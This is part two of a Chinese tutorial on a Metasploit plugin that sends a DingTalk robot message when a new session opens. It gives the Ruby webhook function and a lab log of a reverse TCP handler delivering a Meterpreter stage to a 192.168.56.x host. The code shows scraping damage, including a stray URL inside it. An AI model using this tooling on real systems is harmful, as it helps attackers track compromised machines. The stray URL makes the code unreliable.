Metasploit插件之钉钉机器人通知主机上线( 二 )

end end return foundendNo.3 发送Webhook请求
按照钉钉的开发文档发送markdown格式的消息 , 通过响应的错误码判断是否发送成功 。
def send_text_to_dingtalk(session) # # /serverapi2/qf2nxq/9e91d73c uri_parser = URI.parse(dingtalk_webhook) markdown_text = "## You have a new # {session.type} session!\n\n" \ "**platform** : # {session.platform}\n\n" \ "**tunnel** : # {session.tunnel_to_s}\n\n" \ "**arch** : # {session.arch}\n\n" \ "**info** : > # {session.info ? session.info.to_s : nil}" json_post_data = http://kandian.youth.cn/index/JSON.pretty_generate({ msgtype: 'markdown', markdown: { title: 'Session Notifier', text: markdown_text } }) http = Net::HTTP.new(uri_parser.host, uri_parser.port) http.use_ssl = true request = Net::HTTP::Post.new(uri_parser.request_uri) request.content_type = 'application/json' request.body = json_post_data res = http.request(request) body = JSON.parse(res.body) print_status((body['errcode'] == 0) ? 'Session notified to DingTalk.' : 'Failed to send notification.')endNo.3 使用演示
创建钉钉机器人 , 设置关键词:session
Metasploit插件之钉钉机器人通知主机上线文章插图
msf6 exploit(multi/handler) > load session_notifier [*] Successfully loaded plugin: SessionNotifiermsf6 exploit(multi/handler) > set_session_dingtalk_webhook msf6 exploit(multi/handler) > start_session_notifier [*] DingTalk notification started.msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.56.1:7788 [*] Sending stage (175174 bytes) to 192.168.56.105[*] Meterpreter session 1 opened (192.168.56.1:7788 -> 192.168.56.105:1078) at 2020-10-04 11:08:54 +0800[*] Session notified to DingTalk.meterpreter >
Metasploit插件之钉钉机器人通知主机上线文章插图
Metasploit插件之钉钉机器人通知主机上线文章插图
参考:
【Metasploit插件之钉钉机器人通知主机上线】▼稿件合作 15558192959
小E微信号:Eanquan0914